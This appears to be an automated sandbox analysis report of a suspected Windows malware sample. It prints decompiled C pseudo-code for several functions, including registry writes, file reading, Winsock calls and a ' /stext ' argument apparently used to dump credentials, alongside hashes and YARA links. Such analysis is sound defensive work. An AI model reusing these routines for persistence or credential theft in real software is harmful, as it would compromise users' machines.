                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalSleepTimeV10@V?$basic_string@printf
                                                                                • String ID: %02i:%02i:%02i:%03i [WARNING] $Timeout expired, resetting connection.
                                                                                • API String ID: 2756237499-4159561219
                                                                                • Opcode ID: 796498a58e694e78d7cded5717da42e64b630020b686e4dba5f7067004d3c91d
                                                                                • Instruction ID: eb574a52e8b17308bab00ba60a15c3ae4eff644db24cd51b069feea48370dafb
                                                                                • Opcode Fuzzy Hash: 796498a58e694e78d7cded5717da42e64b630020b686e4dba5f7067004d3c91d
                                                                                • Instruction Fuzzy Hash: 95119372900758EFCB11EBA4D9898EFB7B9BB48301740447FFA42E3581E6B5A944C768
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00413FA4, Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t24;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t54;
				intOrPtr _t57;
				intOrPtr _t60;

				_push(0xffffffff);
				_push(0x416e50);
				_push(0x414130);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t57;
				_v28 = _t57 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x41c26c =  *0x41c26c | 0xffffffff;
				 *0x41c270 =  *0x41c270 | 0xffffffff;
				 *(__p__fmode()) =  *0x41c264;
				_t24 = __p__commode();
				_t47 =  *0x41c260;
				 *_t24 =  *0x41c260;
				 *0x41c268 = _adjust_fdiv;
				_t27 = E00404F3A( *_adjust_fdiv);
				_t60 =  *0x41b190; // 0x1
				if(_t60 == 0) {
					__setusermatherr(E0041412C);
					_pop(_t47);
				}
				E0041411A(_t27);
				_push(0x41b0e8);
				_push(0x41b0e4);
				L00414114();
				_v112 =  *0x41c25c;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x41c258,  &_v112);
				_push(0x41b0e0);
				_push(0x41b000); // executed
				L00414114(); // executed
				_t54 =  *_acmdln;
				_v120 = _t54;
				if( *_t54 != 0x22) {
					while(1) {
						__eflags =  *_t54 - 0x20;
						if(__eflags <= 0) {
							goto L7;
						}
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				} else {
					do {
						_t54 = _t54 + 1;
						_v120 = _t54;
						_t42 =  *_t54;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t54 == 0x22) {
						L6:
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				}
				L7:
				_t36 =  *_t54;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_t68 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E00408C98(_t47, _t68, GetModuleHandleA(0), 0, _t54, _t38); // executed
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L0041410E();
				return _t41;
			}

























                                                                                0x00413fa7
                                                                                0x00413fa9
                                                                                0x00413fae
                                                                                0x00413fb9
                                                                                0x00413fba
                                                                                0x00413fc7
                                                                                0x00413fcc
                                                                                0x00413fd1
                                                                                0x00413fd8
                                                                                0x00413fdf
                                                                                0x00413ff2
                                                                                0x00413ff4
                                                                                0x00413ffa
                                                                                0x00414000
                                                                                0x00414009
                                                                                0x0041400e
                                                                                0x00414013
                                                                                0x00414019
                                                                                0x00414020
                                                                                0x00414026
                                                                                0x00414026
                                                                                0x00414027
                                                                                0x0041402c
                                                                                0x00414031
                                                                                0x00414036
                                                                                0x00414040
                                                                                0x00414059
                                                                                0x0041405f
                                                                                0x00414064
                                                                                0x00414069
                                                                                0x00414076
                                                                                0x00414078
                                                                                0x0041407e
                                                                                0x004140ba
                                                                                0x004140ba
                                                                                0x004140bd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004140bf
                                                                                0x004140c0
                                                                                0x004140c0
                                                                                0x00414080
                                                                                0x00414080
                                                                                0x00414080
                                                                                0x00414081
                                                                                0x00414084
                                                                                0x00414086
                                                                                0x00414091
                                                                                0x00414093
                                                                                0x00414093
                                                                                0x00414094
                                                                                0x00414094
                                                                                0x00414091
                                                                                0x00414097
                                                                                0x00414097
                                                                                0x0041409b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004140a1
                                                                                0x004140a8
                                                                                0x004140ae
                                                                                0x004140b2
                                                                                0x004140c7
                                                                                0x004140b4
                                                                                0x004140b4
                                                                                0x004140b4
                                                                                0x004140d3
                                                                                0x004140d8
                                                                                0x004140dc
                                                                                0x004140e2
                                                                                0x004140e7
                                                                                0x004140e9
                                                                                0x004140ec
                                                                                0x004140ed
                                                                                0x004140ee
                                                                                0x004140f5

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                • String ID:
                                                                                • API String ID: 801014965-0
                                                                                • Opcode ID: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                                                                • Instruction ID: 203440f8f63e4a3495bc52082528d8eb2041b3e21c5ddc4624b2c062dd02aed8
                                                                                • Opcode Fuzzy Hash: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                                                                • Instruction Fuzzy Hash: 92416DB1D40708EFDB209FA5DC89AEA7FB8EB49710F20412FE95197291D7784880CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040AD6F, Relevance: 16.6, APIs: 11, Instructions: 78COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AD79
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,00018C06), ref: 0040AD91
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040ADA1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040ADB0
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADDB
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADF1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE07
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE1D
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE33
                                                                                  • Part of subcall function 0040AE6A: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                                                                  • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                                                                  • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                                                                  • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                                                                  • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                                                                  • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                                                                  • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                                                                  • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                                                                  • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                                                                  • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                                                                  • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                                                                  • Part of subcall function 0040AE6A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                                                                  • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                                                                  • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                                                                  • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                                                                  • Part of subcall function 004020F4: #3.WS2_32(0041BE70,0041BE70,004021ED,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004020F9
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE56
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE5F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@$D@1@@G@std@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@FileG@1@@G@2@@std@@ModuleNameV01@V10@V10@0@V10@@
                                                                                • String ID:
                                                                                • API String ID: 245491849-0
                                                                                • Opcode ID: 4550fca6c17782d827f3fd9ee1601929510a12ddcef61b401cf599926b843e03
                                                                                • Instruction ID: 48313c0a065dcb0dcea7f82e9129112a0e8bb123b90d7e9a0fd4ac289fd1d0c5
                                                                                • Opcode Fuzzy Hash: 4550fca6c17782d827f3fd9ee1601929510a12ddcef61b401cf599926b843e03
                                                                                • Instruction Fuzzy Hash: D3216271A0010DABCB04BBB5DD5A9EE3778EF44341F408569E922A71E1EF745604CB9A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B708, Relevance: 10.5, APIs: 7, Instructions: 41registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 28%
                                                                                			E0040B708(void* _a4, void* _a8, char* _a12, void* _a16, int _a32) {
				char* _t13;
				long _t15;
				void* _t18;
				int _t19;
				void* _t25;

				_t13 = RegCreateKeyA(_a4, _a8,  &_a8); // executed
				if(_t13 != 0) {
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 0;
				} else {
					__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ(_t25, _t18);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t19 = 0;
					_t15 = RegSetValueExA(_a8, _a12, 0, _a32, _t13, _t13); // executed
					RegCloseKey(_a8);
					if(_t15 == 0) {
						_t19 = 1;
					}
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t19;
				}
			}








                                                                                0x0040b715
                                                                                0x0040b71d
                                                                                0x0040b76a
                                                                                0x0040b773
                                                                                0x0040b71f
                                                                                0x0040b724
                                                                                0x0040b72e
                                                                                0x0040b735
                                                                                0x0040b741
                                                                                0x0040b74c
                                                                                0x0040b754
                                                                                0x0040b756
                                                                                0x0040b756
                                                                                0x0040b75b
                                                                                0x0040b766
                                                                                0x0040b766

                                                                                APIs
                                                                                • RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                                                                • RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                                                                • RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B76A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?size@?$basic_string@CloseCreateValue
                                                                                • String ID:
                                                                                • API String ID: 2159132150-0
                                                                                • Opcode ID: 5ecf23a70311ac73239b37152282b423ceb27d5ce4f56abafe3e511b106da1cd
                                                                                • Instruction ID: 9d1a0f58833d5773874e13301f2acc6375a40e0de57f65db8332e1017e2c10e5
                                                                                • Opcode Fuzzy Hash: 5ecf23a70311ac73239b37152282b423ceb27d5ce4f56abafe3e511b106da1cd
                                                                                • Instruction Fuzzy Hash: C901B67200050DEFCF01AFE0ED998EE7B69FB98355B008135FD1AA6160DB319D24DBA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405532, Relevance: 9.1, APIs: 6, Instructions: 59sleepfileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 59%
                                                                                			E00405532(void* __ecx) {
				signed int _t8;
				WCHAR* _t9;
				long _t12;
				void* _t21;
				void* _t22;
				void* _t28;

				_t8 =  *0x41b988; // 0x0
				_t9 = _t8 |  *0x41b98c;
				_t22 = __ecx;
				if(_t9 != 0) {
					 *((char*)(__ecx + 0x30)) = 0;
					do {
						__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
						_t9 = CreateFileW(_t9, 0x80000000, 7, 0, 3, 0x80, 0); // executed
						_t21 = _t9;
						if(_t21 == 0xffffffff) {
							 *((char*)(_t22 + 0x30)) = 0;
						} else {
							_t12 = GetFileSize(_t21, 0);
							_t28 = 0 -  *0x41b98c; // 0x0
							if(_t28 >= 0 && (_t28 > 0 || _t12 >=  *0x41b988)) {
								 *((char*)(_t22 + 0x30)) = 1;
								if( *((intOrPtr*)(_t22 + 0x3c)) != 0) {
									E00405D50(_t22);
								}
								Sleep(0x2710);
							}
							_t9 = FindCloseChangeNotification(_t21); // executed
						}
					} while ( *((char*)(_t22 + 0x30)) == 1);
					if( *((intOrPtr*)(_t22 + 0x3c)) == 0 &&  *0x41b154 == 0x31) {
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z(_t22 + 0x54);
						return E00405180(_t22);
					}
				}
				return _t9;
			}









                                                                                0x00405532
                                                                                0x00405538
                                                                                0x00405540
                                                                                0x00405542
                                                                                0x0040554a
                                                                                0x0040554d
                                                                                0x00405562
                                                                                0x00405569
                                                                                0x0040556f
                                                                                0x00405574
                                                                                0x004055b6
                                                                                0x00405576
                                                                                0x00405578
                                                                                0x00405580
                                                                                0x00405586
                                                                                0x00405595
                                                                                0x00405599
                                                                                0x0040559d
                                                                                0x0040559d
                                                                                0x004055a7
                                                                                0x004055a7
                                                                                0x004055ae
                                                                                0x004055ae
                                                                                0x004055b9
                                                                                0x004055c2
                                                                                0x004055d6
                                                                                0x00000000
                                                                                0x004055de
                                                                                0x004055c2
                                                                                0x004055e6

                                                                                APIs
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                                                                • CreateFileW.KERNELBASE(00000000), ref: 00405569
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                                                                • Sleep.KERNEL32(00002710), ref: 004055A7
                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004055AE
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileG@2@@std@@G@std@@U?$char_traits@V?$allocator@$??0?$basic_string@?c_str@?$basic_string@ChangeCloseCreateFindNotificationSizeSleepV01@@
                                                                                • String ID:
                                                                                • API String ID: 3579047504-0
                                                                                • Opcode ID: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                                                                • Instruction ID: 936fdab3816807404b6184885be68073097791833a96003579df1cad0b33865a
                                                                                • Opcode Fuzzy Hash: 9bf14a5df145d5f41df20096633609b72b1ec63d739e420429c19bf5600fe5fe
                                                                                • Instruction Fuzzy Hash: 2B115670181E40BFDB216334AD8C7AB7BA9EB41300F40843BE582936D0C7B868448F1C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00412DDF, Relevance: 9.0, APIs: 6, Instructions: 48fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 58%
                                                                                			E00412DDF(void _a4, void* _a8) {
				void* _t6;
				int _t9;
				struct _OVERLAPPED* _t13;
				void* _t16;
				long _t17;
				void* _t19;

				_t13 = 0;
				_t6 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0x80, 0); // executed
				_t19 = _t6;
				if(_t19 != 0xffffffff) {
					_t17 = GetFileSize(_t19, 0);
					__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z(_t17, 0, _t16);
					_t8 =  &_a4;
					_a4 = 0;
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t9 = ReadFile(_t19,  &_a4, _t17, _t8, 0); // executed
					if(_t9 != 0) {
						_t13 = 1;
					}
					FindCloseChangeNotification(_t19); // executed
					return _t13;
				}
				return 0;
			}









                                                                                0x00412de3
                                                                                0x00412df9
                                                                                0x00412dff
                                                                                0x00412e04
                                                                                0x00412e16
                                                                                0x00412e1a
                                                                                0x00412e23
                                                                                0x00412e29
                                                                                0x00412e2c
                                                                                0x00412e34
                                                                                0x00412e3d
                                                                                0x00412e3f
                                                                                0x00412e3f
                                                                                0x00412e42
                                                                                0x00000000
                                                                                0x00412e48
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(000177DE,80000000,00000003,00000000,00000003,00000080,00000000,00000000,000177DE,?,00409C9F,00000000), ref: 00412DF9
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E0D
                                                                                • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z.MSVCP60(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E1A
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00000000,?,?,00409C9F,00000000), ref: 00412E2C
                                                                                • ReadFile.KERNELBASE(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E34
                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,00409C9F,00000000), ref: 00412E42
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@?resize@?$basic_string@ChangeCloseCreateFindNotificationReadSize
                                                                                • String ID:
                                                                                • API String ID: 3215869252-0
                                                                                • Opcode ID: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                                                                • Instruction ID: e286a7eceb6258eec42f82ecdc09f82327f8599071822df4e1fbbe5006a6f2d0
                                                                                • Opcode Fuzzy Hash: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                                                                • Instruction Fuzzy Hash: EBF08171241518BFEB125F60EC88FFB7B6CEB867A4F108126FD15D6290CA744E418668
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040ACE6, Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00402038: #23.WS2_32(00000000,00000001,00000006,0041BCB0,0040C8BF), ref: 00402053
                                                                                  • Part of subcall function 0040209B: #4.WS2_32(0041BE70,0041BE74,00000010,?,0041B320,?,0040CA5C), ref: 004020B1
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 0040AD26
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040AD30
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000068,?,?,?,?,?,?), ref: 0040AD44
                                                                                  • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                                                                  • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                                                                  • Part of subcall function 00402149: malloc.MSVCRT ref: 00402175
                                                                                  • Part of subcall function 00402149: #16.WS2_32(0041BE70,00000000,00000000,00000000,0041BE70,0041B310), ref: 00402186
                                                                                  • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,00000000,00000000,00000000,0041BE70,0041B310), ref: 0040219A
                                                                                  • Part of subcall function 00402149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                                                                  • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                                                                  • Part of subcall function 00402149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                                                                  • Part of subcall function 00402149: ??3@YAXPAX@Z.MSVCRT(00000000,0041BE70,00000000,00000000,00000000,0041BE70,0041B310), ref: 004021DB
                                                                                  • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
